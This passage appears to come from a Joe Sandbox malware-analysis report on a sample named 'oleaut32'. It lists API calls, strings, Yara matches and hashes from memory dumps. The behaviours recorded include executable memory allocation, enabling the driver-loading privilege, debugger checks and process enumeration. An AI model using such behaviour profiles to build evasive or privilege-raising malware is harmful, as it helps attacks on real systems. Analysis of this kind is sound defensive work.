                                      • Part of subcall function 00412A13: __NMSG_WRITE.LIBCMT ref: 00412A3A
                                      • Part of subcall function 00412A13: __NMSG_WRITE.LIBCMT ref: 00412A44
                                    • __NMSG_WRITE.LIBCMT ref: 0041027B
                                      • Part of subcall function 00412864: GetModuleFileNameW.KERNEL32(00000000,0041F722,00000104,00000001,00000000,?), ref: 00412900
                                      • Part of subcall function 00412864: __invoke_watson.LIBCMT ref: 00412929
                                      • Part of subcall function 00412864: _wcslen.LIBCMT ref: 0041292F
                                      • Part of subcall function 00412864: _wcslen.LIBCMT ref: 0041293C
                                      • Part of subcall function 0041257E: ___crtCorExitProcess.LIBCMT ref: 00412586
                                      • Part of subcall function 0041257E: ExitProcess.KERNEL32 ref: 0041258F
                                      • Part of subcall function 00411E2C: __getptd_noexit.LIBCMT ref: 00411E2C
                                    • RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00413CED,?,00000001,?,?,004147E0,00000018,0041BE58,0000000C,00414870), ref: 004102A0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: ExitProcess_wcslen$AllocateFileHeapModuleName___crt__getptd_noexit__invoke_watson
                                    • String ID:
                                    • API String ID: 4285633346-0
                                    • Opcode ID: 85379f81ff0939ec83c584100c10549c30d19fa7ca46aaa6a850a0ef7457cf0a
                                    • Instruction ID: 7e8d332be424b32aeb7339ed39cdb599a77868d368d5d78e5393627917a903ca
                                    • Opcode Fuzzy Hash: 85379f81ff0939ec83c584100c10549c30d19fa7ca46aaa6a850a0ef7457cf0a
                                    • Instruction Fuzzy Hash: 7401B535244301AAE22177B6BC56BEB3748AF81378F20007BF505962E1DAFC8CD5826D
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00000008,00000220), ref: 005E31CB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID: p^v
                                    • API String ID: 1279760036-2513449335
                                    • Opcode ID: 1cd788930c564247cd393c45b5d65ccce1caf8e551cf2a5e5869719f3769a3ff
                                    • Instruction ID: 8e67c82df0b9a65515f16c054f49e5bcf29670be3863d0650edfe23ec0f1abe9
                                    • Opcode Fuzzy Hash: 1cd788930c564247cd393c45b5d65ccce1caf8e551cf2a5e5869719f3769a3ff
                                    • Instruction Fuzzy Hash: E4516F716043828BCB1CDE6A949D56EBFE5BBD4340F14492EF5C6CB350DB30DA4A8792
                                    APIs
                                    • FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 005E98DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeFindFirstNotification
                                    • String ID: `2a
                                    • API String ID: 1065410024-1616058253
                                    • Opcode ID: cc034ec3055fb16cc7c8715879e92af1e41e052382ea45cb5777418826fb0385
                                    • Instruction ID: a3f33b20d02c9b5affd01597152d7e686c71c7015f15cd867113ede5a41b14d8
                                    • Opcode Fuzzy Hash: cc034ec3055fb16cc7c8715879e92af1e41e052382ea45cb5777418826fb0385
                                    • Instruction Fuzzy Hash: 5001A270A143C687CB7C9B774C8A73A3A95BBD5740F040868F5C4CB261EB24CD44D752
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00000008,00000050), ref: 005E4214
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID: p^v
                                    • API String ID: 1279760036-2513449335
                                    • Opcode ID: 5172e0a7292ab71e87718e22b7854c462fe3dd9f9efe3b3ca78889e320896681
                                    • Instruction ID: e244db1c75bce2113083c9b49dae5430bfbdf361eeb6ed6fe4350e3416d47e69
                                    • Opcode Fuzzy Hash: 5172e0a7292ab71e87718e22b7854c462fe3dd9f9efe3b3ca78889e320896681
                                    • Instruction Fuzzy Hash: 19E0E571B003C10BDB5CA7BA6C4DD2F2AA67BD9A40704446AF080CF244EE308D029BA1
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0040EC7E
                                    Strings
                                    • tGeKa2B%k9F<3!6T*a>U%*s(fc>&tKC@3cQGhibVLni4I3u>F, xrefs: 0040EC93
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: tGeKa2B%k9F<3!6T*a>U%*s(fc>&tKC@3cQGhibVLni4I3u>F
                                    • API String ID: 4275171209-1198268820
                                    • Opcode ID: 3b538efd8d0877daca6c9ed735cc7399334d432909fa35e9c6d7cd521d04529b
                                    • Instruction ID: 01d0f4e730c09718d0011088008fc3b8b73f4a900f8981e618274441f709c89d
                                    • Opcode Fuzzy Hash: 3b538efd8d0877daca6c9ed735cc7399334d432909fa35e9c6d7cd521d04529b
                                    • Instruction Fuzzy Hash: 9EF046B5A846203BF22157258C0AFAF7E68CB84B50F544528FE046A2C0D7B89A0182DE
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928404757.00000000020D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020D1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_20d1000_oleaut32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8bc432a96edde320610832e569d1738cb5cf434f0fcc55219368fee4b35d9595
                                    • Instruction ID: 5a90a1e5e9cc441ccb4e24c723485e2cb5d86bc965fbe4dd643f51bf61184d7a
                                    • Opcode Fuzzy Hash: 8bc432a96edde320610832e569d1738cb5cf434f0fcc55219368fee4b35d9595
                                    • Instruction Fuzzy Hash: B941E874A01309EFDB45CF54C494BAAB7B2FB88314F24C159E8199F355C775EA82DB80
                                    APIs
                                    • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,33A6B453), ref: 005E462F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FullImageNameProcessQuery
                                    • String ID:
                                    • API String ID: 3578328331-0
                                    • Opcode ID: fa0120e96a6016bd3af749822c7bc7fead0cddff3adf866ac1097749643d638b
                                    • Instruction ID: f0f0b68dcbb83855345e809e4c0d8f33bc607e0c52bceb26bfd089a2b8a305b5
                                    • Opcode Fuzzy Hash: fa0120e96a6016bd3af749822c7bc7fead0cddff3adf866ac1097749643d638b
                                    • Instruction Fuzzy Hash: C7010471B002910BD75CAB7A9C49F6B6AE9BFC4750B050029F5C5CF280EA34CD015BA0
                                    APIs
                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 005E54B1
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InformationVolume
                                    • String ID:
                                    • API String ID: 2039140958-0
                                    • Opcode ID: f07e0c88f9a23d181ba4402892394e66b425546242345c611fa42f463d29fce7
                                    • Instruction ID: d52a535ea4360c1d2d58f104d23507b246614fb9dc0cfd0bd06c2b867c66eae3
                                    • Opcode Fuzzy Hash: f07e0c88f9a23d181ba4402892394e66b425546242345c611fa42f463d29fce7
                                    • Instruction Fuzzy Hash: 0D1170706003819BE72CDB62CC4AB7677B5BB94704F54881CA5D58B1D0FBB4DD498752
                                    APIs
                                    • LoadLibraryW.KERNELBASE(00000000,?,33A6B453,005E6F05,?,33A6B453,005E68AC), ref: 005E6D00
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 56111f9415c96c0aa211578b7618d66db1b44e930d3d04d233d6c0099999502c
                                    • Instruction ID: 0756233e01da076931d5be16e8c7416a1bf7277bac041c62d2c74a9349bfafe8
                                    • Opcode Fuzzy Hash: 56111f9415c96c0aa211578b7618d66db1b44e930d3d04d233d6c0099999502c
                                    • Instruction Fuzzy Hash: C1018470B002C14FC75CAB765D88A2B2AEABBD46807144469F589CF390EA34CD069B60
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 005E4C02
                                    • Process32FirstW.KERNEL32(?,0000022C), ref: 005E4C60
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFirstProcess32SnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 2353314856-0
                                    • Opcode ID: f26af51f5fcc3a4d76e463ed653cbfb2d1ed553985f9b32f311a00a3e9e49388
                                    • Instruction ID: ffeca2f78f490966b3d7d93be9ce1fef563faadb8a7e785df09030a111b167fc
                                    • Opcode Fuzzy Hash: f26af51f5fcc3a4d76e463ed653cbfb2d1ed553985f9b32f311a00a3e9e49388
                                    • Instruction Fuzzy Hash: 69F0E530A212D047CA3C667B5C8E3391A857789300F354905F5D9EB2E0E631CC80EF52
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928404757.00000000020D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020D1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_20d1000_oleaut32.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: e67df3a0f2bd9aee47a50fc50a56210625116345738d3406d5e3f45d897249aa
                                    • Instruction ID: df102b4f6ad5aa3c598680440caf25ebf393a57277452f76324ea4ad259725d0
                                    • Opcode Fuzzy Hash: e67df3a0f2bd9aee47a50fc50a56210625116345738d3406d5e3f45d897249aa
                                    • Instruction Fuzzy Hash: E5D05EB4D41308FFE700EFE4D90AB9DBFB4EB04301F508164E904AB240E6B02A04DF52
                                    APIs
                                    • VirtualFree.KERNELBASE(?,?,?), ref: 020D182F
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928404757.00000000020D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020D1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_20d1000_oleaut32.jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-0
                                    • Opcode ID: 6a40692a0c5b6d2910aa38e7f5b0dd9b1a1fdd170732a314ba8bc0c97438c202
                                    • Instruction ID: f24f861fff804c7bb19be4a5384d262d0b83992b136bcfe5198fd1f87a61bd05
                                    • Opcode Fuzzy Hash: 6a40692a0c5b6d2910aa38e7f5b0dd9b1a1fdd170732a314ba8bc0c97438c202
                                    • Instruction Fuzzy Hash: 53C04C7A55530CAB8B04DF98E894DAB3BADBB8C610B44C548BA1DC7200C634F9108BA5
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 0040E22E
                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040E23B
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 0040E24D
                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0040E28B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                    • String ID: SeLoadDriverPrivilege
                                    • API String ID: 2349140579-497486668
                                    • Opcode ID: cffa3139d4f1966d0e1b8d4b561fce07a712f7e5228b86654aafc6df663748c5
                                    • Instruction ID: 6ea790c7a31b1ba1ad77907437152988263291b3601ce40a83fb03ebe5ecb5a6
                                    • Opcode Fuzzy Hash: cffa3139d4f1966d0e1b8d4b561fce07a712f7e5228b86654aafc6df663748c5
                                    • Instruction Fuzzy Hash: D301DAB4548301AFD704DF50C999F9BBBE4AB8CB08F40891DF58A862A0E774E948CB56
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0041212A
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041213F
                                    • UnhandledExceptionFilter.KERNEL32(0041989C), ref: 0041214A
                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00412166
                                    • TerminateProcess.KERNEL32(00000000), ref: 0041216D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                    • String ID:
                                    • API String ID: 2579439406-0
                                    • Opcode ID: 6f2c9a2ca4667ff0c482e712aad0c8141d9414460f1110707eeb279986343969
                                    • Instruction ID: b5dc470c48336d2cad9fc5f7ad5caf64c585ac90b15cfe1187e4ee1c5b5d9eed
                                    • Opcode Fuzzy Hash: 6f2c9a2ca4667ff0c482e712aad0c8141d9414460f1110707eeb279986343969
                                    • Instruction Fuzzy Hash: 8C21DBB4911204EFD700DF69EC896C63BB4BB6C315F50803AE90A87372E7B4598A8F1D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Pra
                                    • API String ID: 0-3024207128
                                    • Opcode ID: d3c4995f3588d771e323b396eccd1f2f5837ef9389da6937f8d0741b7250e22d
                                    • Instruction ID: 72794d61f80a2729f0e56f82e43f489abd03e102c61a61fb61308adda35e5b9e
                                    • Opcode Fuzzy Hash: d3c4995f3588d771e323b396eccd1f2f5837ef9389da6937f8d0741b7250e22d
                                    • Instruction Fuzzy Hash: 6D5136746001C29BDB2C8F6A8C8963A3EE6FBD0340F144829F591CF295DB75CE049796
                                    APIs
                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004109B8), ref: 00413A7F
                                    • __mtterm.LIBCMT ref: 00413A8B
                                      • Part of subcall function 004137C4: DecodePointer.KERNEL32(00000006,00413BED,?,004109B8), ref: 004137D5
                                      • Part of subcall function 004137C4: TlsFree.KERNEL32(00000004,00413BED,?,004109B8), ref: 004137EF
                                      • Part of subcall function 004137C4: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,00413BED,?,004109B8), ref: 00414742
                                      • Part of subcall function 004137C4: _free.LIBCMT ref: 00414745
                                      • Part of subcall function 004137C4: DeleteCriticalSection.KERNEL32(00000004,76EF5810,?,00413BED,?,004109B8), ref: 0041476C
                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00413AA1
                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00413AAE
                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00413ABB
                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00413AC8
                                    • TlsAlloc.KERNEL32(?,004109B8), ref: 00413B18
                                    • TlsSetValue.KERNEL32(00000000,?,004109B8), ref: 00413B33
                                    • __init_pointers.LIBCMT ref: 00413B3D
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B4E
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B5B
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B68
                                    • EncodePointer.KERNEL32(?,004109B8), ref: 00413B75
                                    • DecodePointer.KERNEL32(00413948,?,004109B8), ref: 00413B96
                                    • __calloc_crt.LIBCMT ref: 00413BAB
                                    • DecodePointer.KERNEL32(00000000,?,004109B8), ref: 00413BC5
                                    • GetCurrentThreadId.KERNEL32 ref: 00413BD7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                    • API String ID: 3698121176-3819984048
                                    • Opcode ID: 7fa4eb56ef05f7034d1ff1bbb87a14009720894ebe7a7eebfb30a0a54c149666
                                    • Instruction ID: b88612f9e2fa8c258af8cfdc3785799afccaa31c7b0e2b814971bbd95b978274
                                    • Opcode Fuzzy Hash: 7fa4eb56ef05f7034d1ff1bbb87a14009720894ebe7a7eebfb30a0a54c149666
                                    • Instruction Fuzzy Hash: 9E31B370904215ABD710AFB9FD096E63FF0AB48765710843BE815D32B1E7799986CF8C
                                    APIs
                                    • PostQuitMessage.USER32(00000000), ref: 0040F8A1
                                    • ShowWindow.USER32(00000000,00000001), ref: 0040F8BA
                                    • SendMessageW.USER32(00000000,0000100C,000000FF,00000002), ref: 0040F901
                                    • wsprintfW.USER32 ref: 0040F92B
                                    • MessageBoxW.USER32(00000000,System process can't been terminated!,Windows Notification,00000000), ref: 0040F956
                                    • SendMessageW.USER32(00000000,0000100C,00000000,00000002), ref: 0040F96B
                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0040FA5F
                                    Strings
                                    • Windows Notification, xrefs: 0040F94B, 0040F9F4
                                    • iPos=%d, xrefs: 0040F925
                                    • System process can't been terminated!, xrefs: 0040F950
                                    • The application name can't be found. Please make sure whether the name is right!, xrefs: 0040F9F9
                                    • View My Processes, xrefs: 0040F9AC
                                    • View All Processes, xrefs: 0040F991
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: Message$SendWindow$PostProcQuitShowwsprintf
                                    • String ID: System process can't been terminated!$The application name can't be found. Please make sure whether the name is right!$View All Processes$View My Processes$Windows Notification$iPos=%d
                                    • API String ID: 4014529712-140908480
                                    • Opcode ID: 746f52bec132f143904a4d114beca3bddeb3b89a76c870e33d9bf59fe38b171c
                                    • Instruction ID: b9e1b8610fbedb75af30f79fd81a6c46aadfc3012c35c013c55d51da3f45cb0f
                                    • Opcode Fuzzy Hash: 746f52bec132f143904a4d114beca3bddeb3b89a76c870e33d9bf59fe38b171c
                                    • Instruction Fuzzy Hash: 8061E7B2610201FBD734AB64EC59BE733A4A788300F14893BE556B76D0E738AC4D8B5D
                                    APIs
                                    • GetUserNameW.ADVAPI32 ref: 0040F53E
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F548
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F58B
                                    • CloseHandle.KERNEL32(00000000), ref: 0040F5A2
                                      • Part of subcall function 0040E170: GetLastError.KERNEL32 ref: 0040E18D
                                      • Part of subcall function 0040E170: FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: CloseCreateErrorFirstFormatHandleLastMessageNameProcess32SnapshotToolhelp32User
                                    • String ID: $%d K$CreateToolhelp32Snapshot (of processes)$Process32First
                                    • API String ID: 3266005361-2221559773
                                    • Opcode ID: 5abc778807c62ae2baa570d19bc32579730fa3d8dd42b44df11fc9701d9f20bb
                                    • Instruction ID: 63f366d3fdf1a23c1a20b758398628cdb4654b08413e4f9ed28baa702ff12125
                                    • Opcode Fuzzy Hash: 5abc778807c62ae2baa570d19bc32579730fa3d8dd42b44df11fc9701d9f20bb
                                    • Instruction Fuzzy Hash: 6251B671504300ABD324AB64DC52FEB73E8EF84758F44493EF589922C1EB7C9948879B
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: wsprintf$MessageSend
                                    • String ID: Description$Memory$Process ID$Process Name$User Name$d
                                    • API String ID: 12235790-2901759098
                                    • Opcode ID: e5dbcb87020978b1e542e2b3685ea65f06ad9b3c102300a686b14875117c4917
                                    • Instruction ID: 279726ffbfae14383190c6c753e1979e50f314c5c8a28d2d91e27df4f51d6de9
                                    • Opcode Fuzzy Hash: e5dbcb87020978b1e542e2b3685ea65f06ad9b3c102300a686b14875117c4917
                                    • Instruction Fuzzy Hash: 772161B1A48340AFC360CF65C895B9BBBE4EB89704F504D2FF08893240D7B99945CF9A
                                    APIs
                                    • OpenProcessToken.ADVAPI32 ref: 0040E2D4
                                    • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,0000012C,?), ref: 0040E2FF
                                    • CloseHandle.KERNEL32(?), ref: 0040E35E
                                    • wsprintfW.USER32 ref: 0040E3AE
                                    • wsprintfW.USER32 ref: 0040E3CD
                                    • wsprintfW.USER32 ref: 0040E3E4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: wsprintf$Token$CloseHandleInformationOpenProcess
                                    • String ID: %s %s$GetTokenInformation$LookupAccountSid$OpenProcessToken
                                    • API String ID: 2594950064-3173787032
                                    • Opcode ID: e7827d6f24756a15ea7fd67e0d12da55e7482696f9941f31bcf56fd5c500a86e
